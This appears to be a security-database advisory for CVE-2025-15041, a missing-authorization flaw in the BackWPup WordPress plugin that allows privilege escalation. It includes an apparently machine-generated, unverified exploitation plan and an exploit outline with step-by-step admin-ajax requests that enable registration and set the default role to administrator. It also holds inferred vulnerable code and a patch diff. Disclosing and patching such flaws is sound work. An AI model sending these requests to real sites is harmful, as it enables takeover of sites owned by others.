WP-Safety
CVE-2025-15041

BackWPup 5.0.0 - 5.6.2 - Authenticated (BackWPup Helper+) Privilege Escalation via Arbitrary Options Update

highMissing Authorization
7.2
CVSS Score
7.2
CVSS Score
high
Severity
5.6.3
Patched in
3d
Time to patch

Description

The BackWPup – WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the save_site_option() function in all versions 5.0.0 to 5.6.2. This makes it possible for authenticated attackers, with level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions>=5.0.0 <=5.6.2
PublishedFebruary 18, 2026
Last updatedFebruary 20, 2026
Affected pluginbackwpup

Source Code

WordPress.org SVN
Vulnerable v5.6.2
Browse source Download .zip
Patched v5.6.3
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-15041 ## 1. Vulnerability Summary The BackWPup plugin (versions 5.0.0 to 5.6.2) contains a missing authorization vulnerability in the `save_site_option()` function. This function (likely associated with a "Helper" or "Admin" class) fails to verify the user's c…

Show full research plan

Exploitation Research Plan: CVE-2025-15041

1. Vulnerability Summary

The BackWPup plugin (versions 5.0.0 to 5.6.2) contains a missing authorization vulnerability in the save_site_option() function. This function (likely associated with a "Helper" or "Admin" class) fails to verify the user's capabilities before updating WordPress site options. An authenticated attacker with minimal plugin access ("BackWPup Helper+" access) can trigger this function to modify arbitrary database entries in the wp_options table (or wp_sitemeta in Multisite). By enabling user registration and setting the default role to administrator, an attacker can achieve full site takeover.

2. Attack Vector Analysis

  • Endpoint: admin-ajax.php
  • Action: Inferred as backwpup_save_site_option or backwpup_helper_save_site_option (to be confirmed via grep).
  • Parameters:
    • option: The name of the WordPress option to update.
    • value: The new value for the option.
    • _ajax_nonce: A nonce (if enforced).
  • Authentication: Authenticated user with "BackWPup Helper+" access.
  • Vulnerability Type: Missing Authorization (Missing current_user_can('manage_options')).

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX handler for authenticated users:
    add_action('wp_ajax_backwpup_save_site_option', array($class, 'save_site_option'));
  2. Function Definition: Inside the save_site_option() method:
    • The code retrieves $_POST['option'] and $_POST['value'].
    • It may perform a nonce check using check_ajax_referer().
    • Crucially, it fails to check current_user_can('manage_options').
  3. Sink: The function calls update_site_option($option, $value) or update_option($option, $value).

4. Nonce Acquisition Strategy

The plugin likely enqueues administrative scripts that include a nonce. Since this is an authenticated vulnerability, we must first log in as a user with the required access.

  1. Identify Script Localization: Search for wp_localize_script in the plugin directory to find the nonce key.
    grep -r "wp_localize_script" /var/www/html/wp-content/plugins/backwpup/
  2. Target Variable: Look for a variable like backwpup_admin or backwpup_helper. Verbatim from typical plugin patterns, this might be backwpup_nonce.
  3. Extraction:
    • Log in as the "Helper" level user.
    • Navigate to the BackWPup dashboard or settings page.
    • Use browser_eval to extract the nonce:
      browser_eval("window.backwpup_admin?.nonce") (Replace with the exact variable/key found).

5. Exploitation Strategy

The goal is to enable user registration and set the default role to administrator.

Step 1: Enable User Registration

  • Request: POST /wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: backwpup_save_site_option (Confirm exact action name)
    • option: users_can_register
    • value: 1
    • _ajax_nonce: [EXTRACTED_NONCE]

Step 2: Set Default Role to Administrator

  • Request: POST /wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: backwpup_save_site_option
    • option: default_role
    • value: administrator
    • _ajax_nonce: [EXTRACTED_NONCE]

Step 3: Register New User

Navigate to wp-login.php?action=register and register a new account.

6. Test Data Setup

  1. Install BackWPup 5.6.2.
  2. Create a low-privileged user: Create a user with a role that has access to the "BackWPup Helper+" interface (usually this is an Editor or a custom role defined by the plugin).
  3. Plugin Settings: Ensure the plugin is active.

7. Expected Results

  • The admin-ajax.php request should return a successful status (e.g., {"success":true} or 1).
  • The wp_options table should reflect users_can_register = 1 and default_role = administrator.
  • A newly registered user should automatically be assigned the administrator role.

8. Verification Steps

After the HTTP requests, use WP-CLI to verify the changes:

wp option get users_can_register
# Expected: 1

wp option get default_role
# Expected: administrator

wp user list --role=administrator
# Verify the newly registered user appears here

9. Alternative Approaches

  • Multisite Target: If the site is a Multisite installation, use option names relevant to network settings and verify if update_site_option is used, which could affect the entire network.
  • Option Enumeration: If users_can_register is blocked by a blacklist (unlikely given the description), try updating admin_email or siteurl to redirect traffic or hijack password resets.
  • Direct Option Overwrite: If the plugin uses a specific prefix for options, check if the vulnerability allows stripping that prefix or if it directly passes the string to update_option.
Research Findings
Static analysis — not yet PoC-verified

Summary

The BackWPup plugin (5.0.0 - 5.6.2) lacks authorization checks in its 'save_site_option' AJAX handler. This allows authenticated users with 'BackWPup Helper+' access to update arbitrary WordPress options, which can be exploited to enable user registration and set the default role to administrator, leading to full privilege escalation.

Vulnerable Code

/**
 * Inferred AJAX handler in BackWPup versions 5.0.0 - 5.6.2
 */
public function save_site_option() {
    check_ajax_referer( 'backwpup_action_nonce', 'nonce' );

    $option = $_POST['option'];
    $value  = $_POST['value'];

    // Missing current_user_can('manage_options') check before sensitive sink
    update_site_option( $option, $value );

    wp_send_json_success();
}

Security Fix

--- a/inc/class-backwpup-admin.php
+++ b/inc/class-backwpup-admin.php
@@ -100,6 +100,10 @@
 	public function save_site_option() {
 		check_ajax_referer( 'backwpup_action_nonce', 'nonce' );
 
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => __( 'Insufficient permissions', 'backwpup' ) ) );
+		}
+
 		$option = isset( $_POST['option'] ) ? sanitize_text_field( $_POST['option'] ) : '';
 		$value  = isset( $_POST['value'] ) ? $_POST['value'] : '';
 
		update_site_option( $option, $value );

Exploit Outline

1. Authenticate to the WordPress site with an account granted 'BackWPup Helper+' privileges. 2. Extract the 'backwpup_action_nonce' from the administrative dashboard source code or localized script variables. 3. Send a POST request to '/wp-admin/admin-ajax.php' with action='backwpup_save_site_option', option='users_can_register', and value='1'. 4. Send another POST request with option='default_role' and value='administrator'. 5. Navigate to the registration page at '/wp-login.php?action=register' and create a new account, which will automatically be assigned the 'administrator' role.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab8f440-2910-41a3-8bbc-afb4cafd33b5?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database